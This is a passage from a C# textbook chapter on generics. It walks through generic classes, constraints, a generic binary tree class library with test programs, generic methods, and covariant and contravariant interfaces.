    public T Dequeue() // use 'T' as the type of the return value
    {
        ...
        T queueItem = this.data[this.tail]; // the data in the array is of type 'T'
        ...
        return queueItem;
    }
}
The type parameter T can be any legal C# identifier, although the lone
character T is commonly used. It is replaced with the type you specify when
you create a Queue object. The following examples create a Queue of ints
and a Queue of Horses:
Queue<int> intQueue = new Queue<int>();
Queue<Horse> horseQueue = new Queue<Horse>();
Additionally, the compiler now has enough information to perform strict
type checking when you build the application. You no longer need to cast
data when you call the Dequeue method, and the compiler can trap any type
mismatch errors early:
intQueue.Enqueue(99);
int myInt = intQueue.Dequeue(); // no casting necessary
Horse myHorse = intQueue.Dequeue(); // compiler error: cannot implicitly convert type 'int' to 'Horse'
You should be aware that this substitution of T for a specified type is not
simply a textual replacement mechanism. Instead, the compiler performs a
complete semantic substitution so that you can specify any valid type for T.
Here are more examples:
struct Person
{
...
}
...
Queue<int> intQueue = new Queue<int>();
Queue<Person> personQueue = new Queue<Person>();
The first example creates a queue of integers, whereas the second example
creates a queue of Person values. The compiler also generates the versions of
the Enqueue and Dequeue methods for each queue. For the intQueue queue,
these methods look like this:
public void Enqueue(int item);
public int Dequeue();
For the personQueue queue, these methods look like this:
public void Enqueue(Person item);
public Person Dequeue();
Contrast these definitions with those of the object-based version of the
Queue class shown in the preceding section. In the methods derived from the
generic class, the item parameter to Enqueue is passed as a value type that
does not require boxing. Similarly, the value returned by Dequeue is also a
value type that does not need to be unboxed. A similar set of methods is
generated for the other two queues.
Note The System.Collections.Generic namespace in the .NET
Framework class library provides an implementation of a Queue class
that operates similarly to the class just described. This namespace also
includes several other collection classes, and they are described in more
detail in Chapter 18, “Using collections.”
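For example, the library version can be used like this (a small sketch; it assumes a using System.Collections.Generic; directive):

Queue<int> numbers = new Queue<int>();
numbers.Enqueue(99);
numbers.Enqueue(-25);
int first = numbers.Dequeue(); // 99; no casting, boxing, or unboxing required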
The type parameter does not have to be a simple class or value type. For
example, you can create a queue of queues of integers (if you should ever
find it necessary), like this:
Queue<Queue<int>> queueQueue = new Queue<Queue<int>>();
A generic class can have multiple type parameters. For example, the
generic Dictionary class defined in the System.Collections.Generic
namespace in the .NET Framework class library expects two type parameters:
one type for keys, and another for the values (this class is described in more
detail in Chapter 18).
Note You can also define generic structures and interfaces by using the
same type-parameter syntax as for generic classes.
Generics vs. generalized classes
It is important to be aware that a generic class that uses type parameters is
different from a generalized class designed to take parameters that can be cast
to different types. For example, the object-based version of the Queue class
shown earlier is a generalized class. There is a single implementation of this
class, and its methods take object parameters and return object types. You
can use this class with ints, strings, and many other types, but in each case,
you are using instances of the same class, and you have to cast the data you
are using to and from the object type.
Compare this with the Queue<T> class. Each time you use this class with
a type parameter (such as Queue<int> or Queue<Horse>), you cause the
compiler to generate an entirely new class that happens to have functionality
defined by the generic class. This means that Queue<int> is a completely
different type from Queue<Horse>, but they both happen to have the same
behavior. You can think of a generic class as one that defines a template that
is then used by the compiler to generate new type-specific classes on demand.
The type-specific versions of a generic class (Queue<int>, Queue<Horse>,
and so on) are referred to as constructed types, and you should treat them as
distinctly different types (albeit ones that have a similar set of methods and
properties).
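You can observe this distinction at run time (a short sketch, using the Queue<T> class defined earlier in this chapter):

Queue<int> intQueue = new Queue<int>();
Queue<Horse> horseQueue = new Queue<Horse>();
Console.WriteLine(intQueue.GetType() == horseQueue.GetType()); // False: two distinct constructed types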
Generics and constraints
Occasionally, you will want to ensure that the type parameter used by a
generic class identifies a type that provides certain methods. For example, if
you are defining a PrintableCollection class, you might want to ensure that
all objects stored in the class have a Print method. You can specify this
condition by using a constraint.
By using a constraint, you can limit the type parameters of a generic class
to those that implement a particular set of interfaces and therefore provide the
methods defined by those interfaces. For example, if the IPrintable interface
defined the Print method, you could create the PrintableCollection class like
this:
public class PrintableCollection<T> where T : IPrintable
When you build this class with a type parameter, the compiler checks to
be sure that the type used for T actually implements the IPrintable interface;
if it doesn’t, it stops with a compilation error.
Creating a generic class
The System.Collections.Generic namespace in the .NET Framework class
library contains some generic classes readily available for you. You can also
define your own generic classes, which is what you will do in this section.
Before you do this, let’s cover a bit of background theory.
The theory of binary trees
In the following exercises, you will define and use a class that represents a
binary tree.
A binary tree is a useful data structure that you can use for a variety of
operations, including sorting and searching through data very quickly.
Volumes have been written on the minutiae of binary trees, but it is not the
purpose of this book to cover this topic in detail. Instead, you’ll look at just
the pertinent facts. If you are interested in learning more, consult a book such
as The Art of Computer Programming, Volume 3: Sorting and Searching, 2nd
Edition by Donald E. Knuth (Addison-Wesley Professional, 1998). Despite
its age, this is the recognized, seminal work on sort and search algorithms.
A binary tree is a recursive (self-referencing) data structure that can be
empty or contain three elements: a datum, which is typically referred to as the
node, and two subtrees, which are themselves binary trees. The two subtrees
are conventionally called the left subtree and the right subtree because they
are typically depicted to the left and right of the node, respectively. Each left
subtree or right subtree is either empty or contains a node and other subtrees.
In theory, the whole structure can continue ad infinitum. The following image
shows the structure of a small binary tree.
The real power of binary trees becomes evident when you use them for
sorting data. If you start with an unordered sequence of objects of the same
type, you can construct an ordered binary tree and then walk through the tree
to visit each node in an ordered sequence. The algorithm for inserting an item
I into an ordered binary tree B is shown here:
If the tree, B, is empty
Then
    Construct a new tree B with the new item I as the node, and empty left and right subtrees
Else
    Examine the value of the current node, N, of the tree, B
    If the value of N is greater than that of the new item, I
    Then
        If the left subtree of B is empty
        Then
            Construct a new left subtree of B with the item I as the node, and empty left and right subtrees
        Else
            Insert I into the left subtree of B
        End If
    Else
        If the right subtree of B is empty
        Then
            Construct a new right subtree of B with the item I as the node, and empty left and right subtrees
        Else
            Insert I into the right subtree of B
        End If
    End If
End If
Notice that this algorithm is recursive, calling itself to insert the item into
the left or right subtree depending on how the value of the item compares
with the current node in the tree.
Note The definition of the expression greater than depends on the type
of data in the item and node. For numeric data, greater than can be a
simple arithmetic comparison, and for text data, it can be a string
comparison; however, you must give other forms of data their own
means of comparing values. You will learn more about this when you
implement a binary tree in the upcoming section “Building a binary tree
class by using generics.”
If you start with an empty binary tree and an unordered sequence of
objects, you can iterate through the unordered sequence, inserting each object
into the binary tree by using this algorithm, resulting in an ordered tree. The
next image shows the steps in the process for constructing a tree from a set of
five integers.
After you have built an ordered binary tree, you can display its contents in
sequence by visiting each node in turn and printing the value found. The
algorithm for achieving this task is also recursive:
If the left subtree is not empty
Then
    Display the contents of the left subtree
End If
Display the value of the node
If the right subtree is not empty
Then
    Display the contents of the right subtree
End If
The following image shows the steps in the process for outputting the tree.
Notice that the integers are now displayed in ascending order.
Building a binary tree class by using generics
In the following exercise, you will use generics to define a binary tree class
capable of holding almost any type of data. The only restriction is that the
data type must provide a means of comparing values between different
instances.
The binary tree class is one that you might find useful in many different
applications. Therefore, you will implement it as a class library rather than as
an application in its own right. You can then use this class elsewhere without
having to copy the source code and recompile it. A class library is a set of
compiled classes (and other types such as structures and delegates) stored in
an assembly. An assembly is a file that usually has the .dll suffix. Other
projects and applications can make use of the items in a class library by
adding a reference to its assembly and then bringing its namespaces into
scope by employing using directives. You will do this when you test the
binary tree class.
The System.IComparable and
System.IComparable<T> interfaces
The algorithm for inserting a node into a binary tree requires you to
compare the value of the node that you are inserting with nodes already
in the tree. If you are using a numeric type, such as int, you can use the
<, >, and == operators. However, if you are using some other type,
such as Mammal or Circle described in earlier chapters, how do you
compare objects?
If you need to create a class that requires you to be able to compare
values according to some natural (or possibly unnatural) ordering, you
should implement the IComparable interface. This interface contains a
method called CompareTo, which takes a single parameter specifying
the object to be compared with the current instance and returns an
integer that indicates the result of the comparison, as summarized by the
following table.
Value            Meaning
Less than 0      The current instance is less than the value of the parameter.
0                The current instance is equal to the value of the parameter.
Greater than 0   The current instance is greater than the value of the parameter.
As an example, consider the Circle class that was described in
Chapter 7. Let’s take a look at it again here:
class Circle
{
public Circle(int initialRadius)
{
radius = initialRadius;
}
public double Area()
{
return Math.PI * radius * radius;
}
private double radius;
}
You can make the Circle class “comparable” by implementing the
System.IComparable interface and providing the CompareTo method.
In this example, the CompareTo method compares Circle objects based
on their areas. A circle with a larger area is considered to be greater
than a circle with a smaller area.
class Circle : System.IComparable
{
...
public int CompareTo(object obj)
{
Circle circObj = (Circle)obj; // cast the parameter to
its real type
if (this.Area() == circObj.Area())
return 0;
if (this.Area() > circObj.Area())
return 1;
return -1;
}
}
If you examine the System.IComparable interface, you will see that
its parameter is defined as an object. However, this approach is not type
safe. To understand why this is so, consider what happens if you try to
pass something that is not a Circle to the CompareTo method. The
System.IComparable interface requires the use of a cast to access the
Area method. If the parameter is not a Circle but some other type of
object, this cast will fail. However, the System namespace also defines
the generic IComparable<T> interface, which contains the following
method:
int CompareTo(T other);
Notice that this method takes a type parameter (T) rather than an
object, and therefore it is much safer than the nongeneric version of the
interface. The following code shows how you can implement this
interface in the Circle class:
class Circle : System.IComparable<Circle>
{
...
public int CompareTo(Circle other)
{
if (this.Area() == other.Area())
return 0;
if (this.Area() > other.Area())
return 1;
return -1;
}
}
The parameter for the CompareTo method must match the type
specified in the interface, IComparable<Circle>. In general, it is
preferable to implement the System.IComparable<T> interface rather
than the System.IComparable interface. You can also implement both,
just as many of the types in the .NET Framework do.
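If you do implement both, a common pattern is to have the nongeneric
CompareTo simply delegate to the type-safe version. The following
fragment is a minimal sketch of this pattern for the Circle class; the
type check and the exception are additions for illustration and are not
part of the earlier examples:

class Circle : System.IComparable, System.IComparable<Circle>
{
    ...
    public int CompareTo(Circle other)
    {
        if (this.Area() == other.Area())
            return 0;
        if (this.Area() > other.Area())
            return 1;
        return -1;
    }

    int System.IComparable.CompareTo(object obj)
    {
        if (!(obj is Circle))
        {
            throw new System.ArgumentException("Parameter is not a Circle");
        }
        // Delegate to the type-safe implementation
        return this.CompareTo((Circle)obj);
    }
}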
Create the Tree<TItem> class
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. On the File menu, point to New, and then click Project.
3. In the New Project dialog box, in the Installed pane on the left, click
Visual C#. In the middle pane, select the Class Library (.NET
Framework) template. In the Name box, type BinaryTree. In the
Location box, specify \Microsoft Press\VCSBS\Chapter 17 in your
Documents folder, and then click OK.
Note Make sure that you select the Class Library (.NET
Framework) template, and not Class Library (.NET Standard). The
.NET Framework template includes functionality that is specific to
Windows, and that is not available through the .NET Standard
template.
Using the Class Library template, you can create assemblies that can be
reused by different applications. To utilize a class in a class library in an
application, you must first copy the assembly containing the compiled
code for the class library to your computer (if you did not create it
yourself) and then add a reference to this assembly.
4. In Solution Explorer, right-click Class1.cs, click Rename, and then
change the name of the file to Tree.cs. Allow Visual Studio to change
the name of the class as well as the name of the file when you are
prompted.
5. In the Code and Text Editor window, change the definition of the Tree
class to Tree<TItem>, as shown in bold in the following code:
public class Tree<TItem>
{
}
6. In the Code and Text Editor window, modify the definition of the
Tree<TItem> class to specify that the type parameter TItem must denote
a type that implements the generic IComparable<TItem> interface. The
changes are highlighted in bold in the code example that follows.
The modified definition of the Tree<TItem> class should look like this:
public class Tree<TItem> where TItem : IComparable<TItem>
{
}
7. Add three public, automatic properties to the Tree<TItem> class: a
TItem property called NodeData and Tree<TItem> properties called
LeftTree and RightTree, as shown in the following code example in
bold:
public class Tree<TItem> where TItem : IComparable<TItem>
{
public TItem NodeData { get; set; }
public Tree<TItem> LeftTree { get; set; }
public Tree<TItem> RightTree { get; set; }
}
8. Add a constructor to the Tree<TItem> class that takes a single TItem
parameter called nodeValue. In the constructor, set the NodeData
property to nodeValue, and initialize the LeftTree and RightTree
properties to null, as shown in bold in the following code:
public class Tree<TItem> where TItem : IComparable<TItem>
{
...
public Tree(TItem nodeValue)
{
this.NodeData = nodeValue;
this.LeftTree = null;
this.RightTree = null;
}
}
Note Notice that the name of the constructor does not include the
type parameter; it is called Tree, not Tree<TItem>.
9. Add a public method called Insert to the Tree<TItem> class as shown in
bold in the code that follows. This method will insert a TItem value into
the tree (once you have completed it).
The method definition should look like this:
public class Tree<TItem> where TItem: IComparable<TItem>
{
...
public void Insert(TItem newItem)
{
}
}
You will implement the recursive algorithm described earlier for
creating an ordered binary tree. The constructor creates the initial node
of the tree, so the Insert method can assume that the tree is not empty.
The code that follows is the part of the algorithm that runs after
checking whether the tree is empty. It’s reproduced here to help you
understand the code you will write for the Insert method in the
following steps:
...
Examine the value of the node, N, of the tree, B
If the value of N is greater than that of the new item, I
Then
If the left subtree of B is empty
Then
Construct a new left subtree of B with the item I as the node, and empty left and right subtrees
Else
Insert I into the left subtree of B
End If
...
10. In the Insert method, add a statement that declares a local variable of
type TItem, called currentNodeValue. Initialize this variable to the value
of the NodeData property of the tree, as shown in bold in the following
example:
public void Insert(TItem newItem)
{
TItem currentNodeValue = this.NodeData;
}
11. Add the if-else statement shown in bold in the following code to the
Insert method after the definition of the currentNodeValue variable.
This statement uses the CompareTo method of the IComparable<T>
interface to determine whether the value of the current node is greater
than that of the new item:
public void Insert(TItem newItem)
{
TItem currentNodeValue = this.NodeData;
if (currentNodeValue.CompareTo(newItem) > 0)
{
// Insert the new item into the left subtree
}
else
{
// Insert the new item into the right subtree
}
}
12. In the if part of the code, immediately after the comment // Insert the
new item into the left subtree, add the following statements:
if (this.LeftTree == null)
{
this.LeftTree = new Tree<TItem>(newItem);
}
else
{
this.LeftTree.Insert(newItem);
}
These statements check whether the left subtree is empty. If so, a new
tree is created using the new item, and it is attached as the left subtree of
the current node; otherwise, the new item is inserted into the existing left
subtree by calling the Insert method recursively.
13. In the else part of the outermost if-else statement, immediately after the
comment // Insert the new item into the right subtree, add the equivalent
code that inserts the new node into the right subtree:
if (this.RightTree == null)
{
this.RightTree = new Tree<TItem>(newItem);
}
else
{
this.RightTree.Insert(newItem);
}
14. Add another public method called WalkTree to the Tree<TItem> class
after the Insert method.
This method walks through the tree, visiting each node in sequence, and
generates a string representation of the data that the tree contains. The
method definition should look like this:
public string WalkTree()
{
}
15. Add the statements shown in bold in the code that follows to the
WalkTree method.
These statements implement the algorithm described earlier for
traversing a binary tree. As each node is visited, the node value is
appended to the string returned by the method:
public string WalkTree()
{
string result = "";
if (this.LeftTree != null)
{
result = this.LeftTree.WalkTree();
}
result += $" {this.NodeData.ToString()} ";
if (this.RightTree != null)
{
result += this.RightTree.WalkTree();
}
return result;
}
16. On the Build menu, click Build Solution. The class should compile
cleanly, but correct any errors that are reported and rebuild the solution
if necessary.
In the next exercise, you will test the Tree<TItem> class by creating
binary trees of integers and strings.
Test the Tree<TItem> class
1. In Solution Explorer, right-click the BinaryTree solution, point to Add,
and then click New Project.
Note Be sure that you right-click the BinaryTree solution rather
than the BinaryTree project.
2. Add a new project by using the Console App (.NET Framework)
template. Give the project the name BinaryTreeTest. Set the location to
\Microsoft Press\VCSBS\Chapter 17 in your Documents folder, and then
click OK.
Note A Visual Studio 2017 solution can contain more than one
project. You are using this feature to add a second project to the
BinaryTree solution for testing the Tree<TItem> class.
3. In Solution Explorer, right-click the BinaryTreeTest project, and then
click Set As Startup Project.
The BinaryTreeTest project is highlighted in Solution Explorer. When
you run the application, this is the project that will actually execute.
4. In Solution Explorer, right-click the BinaryTreeTest project, point to
Add, and then click Reference. The Reference Manager dialog box
appears. You use this dialog box to add a reference to an assembly. This
enables you to use the classes and other types implemented by that
assembly in your code.
5. In the left pane of the Reference Manager - BinaryTreeTest dialog box,
expand Projects and then click Solution. In the middle pane, select the
BinaryTree project (be sure to select the check box and not simply click
the assembly), and then click OK.
This step adds the BinaryTree assembly to the list of references for the
BinaryTreeTest project in Solution Explorer. If you examine the
References folder for the BinaryTreeTest project in Solution Explorer,
you should see the BinaryTree assembly listed at the top. You will now
be able to create Tree<TItem> objects in the BinaryTreeTest project.
Note If the class library project is not part of the same solution as
the project that uses it, you must add a reference to the assembly
(the .dll file) and not to the class library project. You can do this by
browsing for the assembly in the Reference Manager dialog box.
You will use this technique in the final set of exercises in this
chapter.
6. In the Code and Text Editor window displaying the Program class in the
Program.cs file, add the following using directive to the list at the top of
the class:
using BinaryTree;
7. Add the statements shown in bold in the following code to the Main
method:
static void Main(string[] args)
{
Tree<int> tree1 = new Tree<int>(10);
tree1.Insert(5);
tree1.Insert(11);
tree1.Insert(5);
tree1.Insert(-12);
tree1.Insert(15);
tree1.Insert(0);
tree1.Insert(14);
tree1.Insert(-8);
tree1.Insert(10);
tree1.Insert(8);
tree1.Insert(8);
string sortedData = tree1.WalkTree();
Console.WriteLine($"Sorted data is: ");
}
These statements create a new binary tree for holding ints. The
constructor creates an initial node containing the value 10. The Insert
statements add nodes to the tree, and the WalkTree method generates a
string representing the contents of the tree, which should appear sorted
in ascending order when this string is displayed.
Note Remember that the int keyword in C# is just an alias for the
System.Int32 type; whenever you declare an int variable, you are
actually declaring a struct variable of type System.Int32. The
System.Int32 type implements the IComparable and
IComparable<T> interfaces, which is why you can create
Tree<int> objects. Similarly, the string keyword is an alias for
System.String, which also implements IComparable and
IComparable<T>.
8. On the Build menu, click Build Solution, and verify that the solution
compiles. Correct any errors if necessary.
9. On the Debug menu, click Start Without Debugging.
Verify that the program runs and displays the values in the following
sequence:
-12 -8 0 5 5 8 8 10 10 11 14 15
10. Press the Enter key to return to Visual Studio 2017.
11. Add the following statements shown in bold to the end of the Main
method in the Program class, after the existing code:
static void Main(string[] args)
{
...
Tree<string> tree2 = new Tree<string>("Hello");
tree2.Insert("World");
tree2.Insert("How");
tree2.Insert("Are");
tree2.Insert("You");
tree2.Insert("Today");
tree2.Insert("I");
tree2.Insert("Hope");
tree2.Insert("You");
tree2.Insert("Are");
tree2.Insert("Feeling");
tree2.Insert("Well");
tree2.Insert("!");
sortedData = tree2.WalkTree();
Console.WriteLine($"Sorted data is: ");
}
These statements create another binary tree for holding strings, populate
it with some test data, and then print the tree. This time the data should
be sorted alphabetically; the System.String class (string is an alias for
System.String) implements the IComparable and IComparable<string>
interfaces.
12. On the Build menu, click Build Solution, and verify that the solution
compiles. Correct any errors if necessary.
13. On the Debug menu, click Start Without Debugging.
Verify that the program runs and displays the integer values as before,
followed by the strings in the following sequence:
! Are Are Feeling Hello Hope How I Today Well World You You
14. Press the Enter key to return to Visual Studio 2017.
Creating a generic method
As well as defining generic classes, you can create generic methods.
With a generic method, you can specify the types of the parameters and
the return type by using a type parameter like that used when you define a
generic class. In this way, you can define generalized methods that are type
safe and avoid the overhead of casting (and boxing, in some cases). Generic
methods are frequently used in conjunction with generic classes; you need
them for methods that take generic types as parameters or that have a return
type that is a generic type.
You define generic methods by using the same type parameter syntax you
use when you create generic classes. (You can also specify constraints.) For
example, the generic Swap<T> method in the code that follows swaps the
values in its parameters. Because this functionality is useful regardless of the
type of data being swapped, it is helpful to define it as a generic method:
static void Swap<T>(ref T first, ref T second)
{
T temp = first;
first = second;
second = temp;
}
You invoke the method by specifying the appropriate type for its type
parameter. The following examples show how to invoke the Swap<T>
method to swap two ints and two strings:
int a = 1, b = 2;
Swap<int>(ref a, ref b);
...
string s1 = "Hello", s2 = "World";
Swap<string>(ref s1, ref s2);
Note Just as instantiating a generic class with different type parameters
causes the compiler to generate different types, each distinct use of the
Swap<T> method causes the compiler to generate a different version of
the method. Swap<int> is not the same method as Swap<string>—both
methods just happen to have been generated from the same generic
template, so they exhibit the same behavior, albeit over different types.
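In many cases you can omit the type argument altogether, because the
compiler can infer it from the types of the arguments you supply. The
following calls are equivalent to the explicit forms shown above:

int a = 1, b = 2;
Swap(ref a, ref b);       // the compiler infers Swap<int>
...
string s1 = "Hello", s2 = "World";
Swap(ref s1, ref s2);     // the compiler infers Swap<string>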
Defining a generic method to build a binary tree
In the previous exercise, you created a generic class for implementing a
binary tree. The Tree<TItem> class provides the Insert method for adding
data items to the tree. However, if you want to add a large number of items,
repeated calls to the Insert method are not very convenient. In the following
exercise, you will define a generic method called InsertIntoTree that you can
use to insert a list of data items into a tree with a single method call. You will
test this method by using it to insert a list of characters into a tree of
characters.
Write the InsertIntoTree method
1. Using Visual Studio 2017, create a new project by using the Console
App (.NET Framework) template. In the New Project dialog box, name
the project BuildTree. Set the location to \Microsoft
Press\VCSBS\Chapter 17 in your Documents folder. In the Solution
drop-down list, click Create New Solution and then click OK.
2. On the Project menu, click Add Reference.
3. In the Reference Manager - BuildTree dialog box, click the Browse
button (not the Browse tab in the left pane).
4. In the Select The Files To Reference dialog box, browse to the folder
\Microsoft Press\VCSBS\Chapter 17\BinaryTree\BinaryTree\bin\Debug
in your Documents folder, click BinaryTree.dll, and then click Add.
5. In the Reference Manager – BuildTree dialog box, verify that the
BinaryTree.dll assembly is listed and that the check box for this
assembly is selected, and then click OK.
The BinaryTree assembly is added to the list of references shown in
Solution Explorer.
6. In the Code and Text Editor window displaying the Program.cs file, add
the following using directive to the top of the Program.cs file:
using BinaryTree;
Remember, this namespace contains the Tree<TItem> class.
7. After the Main method in the Program class, add a method named
InsertIntoTree. This method should be declared as a static void method
that takes a Tree<TItem> parameter and a params array of TItem
elements called data. The tree parameter should be passed by reference,
for reasons that will be described in a later step.
The method definition should look like this:
static void InsertIntoTree<TItem>(ref Tree<TItem> tree, params TItem[] data)
{
}
8. The TItem type used for the elements being inserted into the binary tree
must implement the IComparable<TItem> interface. Modify the
definition of the InsertIntoTree method and add the where clause shown
in bold in the following code:
static void InsertIntoTree<TItem>(ref Tree<TItem> tree, params TItem[] data)
    where TItem : IComparable<TItem>
{
}
9. Add the statements shown in bold in the example that follows to the
InsertIntoTree method.
These statements iterate through the params list, adding each item to the
tree by using the Insert method. If the value specified by the tree
parameter is null initially, a new Tree<TItem> is created; this is why the
tree parameter is passed by reference.
static void InsertIntoTree<TItem>(ref Tree<TItem> tree, params TItem[] data)
    where TItem : IComparable<TItem>
{
foreach (TItem datum in data)
{
if (tree == null)
{
tree = new Tree<TItem>(datum);
}
else
{
tree.Insert(datum);
}
}
}
Test the InsertIntoTree method
1. In the Main method of the Program class, add the following statements
shown in bold. This code creates a new Tree for holding character data,
populates it with some sample data by using the InsertIntoTree method,
and then displays it by using the WalkTree method of Tree:
static void Main(string[] args)
{
Tree<char> charTree = null;
InsertIntoTree<char>(ref charTree, 'M', 'X', 'A', 'M', 'Z', 'Z', 'N');
string sortedData = charTree.WalkTree();
Console.WriteLine($"Sorted data is: {sortedData}");
}
2. On the Build menu, click Build Solution, verify that the solution
compiles, and then correct any errors if necessary.
3. On the Debug menu, click Start Without Debugging.
Verify that the program runs and displays the character values in the
following order:
A M M N X Z Z
4. Press the Enter key to return to Visual Studio 2017.
Variance and generic interfaces
Chapter 8 demonstrates that you can use the object type to hold a value or
reference of any other type. For example, the following code is completely
legal:
string myString = "Hello";
object myObject = myString;
Remember that in inheritance terms, the String class is derived from the
Object class, so all strings are objects.
Now consider the following generic interface and class:
interface IWrapper<T>
{
void SetData(T data);
T GetData();
}
class Wrapper<T> : IWrapper<T>
{
private T storedData;
void IWrapper<T>.SetData(T data)
{
this.storedData = data;
}
T IWrapper<T>.GetData()
{
return this.storedData;
}
}
The Wrapper<T> class provides a simple wrapper around a specified
type. The IWrapper<T> interface defines the SetData method that the
Wrapper<T> class implements to store the data and the GetData method
that it implements to retrieve the data. You can create an instance of
this class and use it to wrap a string like this:
Wrapper<string> stringWrapper = new Wrapper<string>();
IWrapper<string> storedStringWrapper = stringWrapper;
storedStringWrapper.SetData("Hello");
Console.WriteLine($"Stored value is
{storedStringWrapper.GetData()}");
The code creates an instance of the Wrapper<string> type. It references
the object through the IWrapper<string> interface to call the SetData
method. (The Wrapper<T> type implements its interfaces explicitly, so you
must call the methods through an appropriate interface reference.) The code
also calls the GetData method through the IWrapper<string> interface. If
you run this code, it outputs the message “Stored value is Hello.”
Take a look at the following line of code:
IWrapper<object> storedObjectWrapper = stringWrapper;
This statement is similar to the one that creates the IWrapper<string>
reference in the previous code example, the difference being that the type
parameter is object rather than string. Is this code legal? Remember that all
strings are objects (you can assign a string value to an object reference, as
shown earlier), so in theory, this statement looks promising. However, if you
try it, the statement will fail to compile with the message “Cannot implicitly
convert type ‘Wrapper<string>’ to ‘IWrapper<object>’.”
You can try an explicit cast such as this:
IWrapper<object> storedObjectWrapper = (IWrapper<object>)stringWrapper;
This code compiles but will fail at runtime with an InvalidCastException
exception. The problem is that although all strings are objects, the converse is
not true. If this statement were allowed, you could write code like this, which
ultimately attempts to store a Circle object in a string field:
IWrapper<object> storedObjectWrapper = (IWrapper<object>)stringWrapper;
Circle myCircle = new Circle();
storedObjectWrapper.SetData(myCircle);
The IWrapper<T> interface is said to be invariant. You cannot assign an
IWrapper<A> object to a reference of type IWrapper<B>, even if type A is
derived from type B. By default, C# implements this restriction to ensure the
type safety of your code.
Covariant interfaces
Suppose that you defined the IStoreWrapper<T> and IRetrieveWrapper<T>
interfaces, shown in the following example, in place of IWrapper<T> and
implemented these interfaces in the Wrapper<T> class like this:
interface IStoreWrapper<T>
{
void SetData(T data);
}
interface IRetrieveWrapper<T>
{
T GetData();
}
class Wrapper<T> : IStoreWrapper<T>, IRetrieveWrapper<T>
{
private T storedData;
void IStoreWrapper<T>.SetData(T data)
{
this.storedData = data;
}
T IRetrieveWrapper<T>.GetData()
{
return this.storedData;
}
}
Functionally, the Wrapper<T> class is the same as before, except that you
access the SetData and GetData methods through different interfaces.
Wrapper<string> stringWrapper = new Wrapper<string>();
IStoreWrapper<string> storedStringWrapper = stringWrapper;
storedStringWrapper.SetData("Hello");
IRetrieveWrapper<string> retrievedStringWrapper = stringWrapper;
Console.WriteLine($"Stored value is
{retrievedStringWrapper.GetData()}");
So, is the following code legal?
IRetrieveWrapper<object> retrievedObjectWrapper = stringWrapper;
The quick answer is no, and it fails to compile with the same error as
before. But if you think about it, although the C# compiler has deemed that
this statement is not type safe, the reasons for assuming this are no longer
valid. The IRetrieveWrapper<T> interface only allows you to read the data
held in the Wrapper<T> object by using the GetData method, and it does not
provide any way to change the data. In situations such as this where the type
parameter occurs only as the return value of the methods in a generic
interface, you can inform the compiler that some implicit conversions are
legal and that it does not have to enforce strict type safety. You do this by
specifying the out keyword when you declare the type parameter, like this:
interface IRetrieveWrapper<out T>
{
T GetData();
}
This feature is called covariance. You can assign an
IRetrieveWrapper<A> object to an IRetrieveWrapper<B> reference as long
as there is a valid conversion from type A to type B, or type A derives from
type B. The following code now compiles and runs as expected:
// string derives from object, so this is now legal
IRetrieveWrapper<object> retrievedObjectWrapper = stringWrapper;
You can specify the out qualifier with a type parameter only if the type
parameter occurs as the return type of methods. If you use the type parameter
to specify the type of any method parameters, the out qualifier is illegal, and
your code will not compile. Also, covariance works only with reference
types. This is because value types cannot form inheritance hierarchies. So,
the following code will not compile because int is a value type:
Wrapper<int> intWrapper = new Wrapper<int>();
IStoreWrapper<int> storedIntWrapper = intWrapper; // this is legal
...
// the following statement is not legal - ints are not objects
IRetrieveWrapper<object> retrievedObjectWrapper = intWrapper;
Several of the interfaces defined by the .NET Framework exhibit
covariance, including the IEnumerable<T> interface, which is detailed in
Chapter 19, “Enumerating collections.”
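As a brief sketch of this built-in covariance, the following assignment
is legal because the IEnumerable<T> interface declares its type
parameter with the out qualifier:

IEnumerable<string> strings = new List<string> { "Hello", "World" };
// Legal: IEnumerable<out T> is covariant, and string derives from object
IEnumerable<object> objects = strings;
foreach (object o in objects)
{
    Console.WriteLine(o);
}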
Note Only interface and delegate types (which are covered in Chapter
18) can be declared as covariant. You do not specify the out modifier
with generic classes.
Contravariant interfaces
Contravariance follows a similar principle to covariance except that it works
in the opposite direction; it enables you to use a generic interface to reference
an object of type B through a reference to type A as long as type B derives
from type A. This sounds complicated, so it is worth looking at an example
from the .NET Framework class library.
The System.Collections.Generic namespace in the .NET Framework
provides an interface called IComparer, which looks like this:
public interface IComparer<in T>
{
int Compare(T x, T y);
}
A class that implements this interface has to define the Compare method,
which is used to compare two objects of the type specified by the T type
parameter. The Compare method is expected to return an integer value: zero
if the parameters x and y have the same value, negative if x is less than y, and
positive if x is greater than y. The following code shows an example that sorts
objects according to their hash code. (The GetHashCode method is
implemented by the Object class. It simply returns an integer value that
identifies the object. All reference types inherit this method and can override
it with their own implementations.)
class ObjectComparer : IComparer<Object>
{
int IComparer<Object>.Compare(Object x, Object y)
{
int xHash = x.GetHashCode();
int yHash = y.GetHashCode();
if (xHash == yHash) return 0;
if (xHash < yHash)
return -1;
return 1;
}
}
You can create an ObjectComparer object and call the Compare method
through the IComparer<Object> interface to compare two objects, like this:
Object x = ...;
Object y = ...;
ObjectComparer objectComparer = new ObjectComparer();
IComparer<Object> objectComparator = objectComparer;
int result = objectComparator.Compare(x, y);
That’s the boring bit. What is more interesting is that you can reference
this same object through a version of the IComparer interface that compares
strings, like this:
IComparer<String> stringComparator = objectComparer;
At first glance, this statement seems to break every rule of type safety that
you can imagine. However, if you think about what the IComparer<T>
interface does, this approach makes sense. The purpose of the Compare
method is to return a value based on a comparison between the parameters
passed in. If you can compare Objects, you certainly should be able to
compare Strings, which are just specialized types of Objects. After all, a
String should be able to do anything that an Object can do—that is the
purpose of inheritance.
This still sounds a little presumptive, however. How does the C# compiler
know that you are not going to perform any type-specific operations in the
code for the Compare method that might fail if you invoke the method
through an interface based on a different type? If you revisit the definition of
the IComparer interface, you can see the in qualifier before the type
parameter:
public interface IComparer<in T>
{
int Compare(T x, T y);
}
The in keyword tells the C# compiler that you can either pass the type T as
the parameter type to methods or pass any type that derives from T. You
cannot use T as the return type from any methods. Essentially, this makes it
possible for you to reference an object either through a generic interface
based on the object type or through a generic interface based on a type that
derives from the object type. Basically, if type A exposes some operations,
properties, or fields, then type B, which derives from type A, must also
expose the same operations (which might behave differently if they have
been overridden), properties, and fields. Consequently, it should be safe to
substitute an object of type B for an object of type A.
Covariance and contravariance might seem like fringe topics in the world
of generics, but they are useful. For example, the List<T> generic collection
class (in the System.Collections.Generic namespace) uses IComparer<T>
objects to implement the Sort and BinarySearch methods. A List<Object>
object can contain a collection of objects of any type, so the Sort and
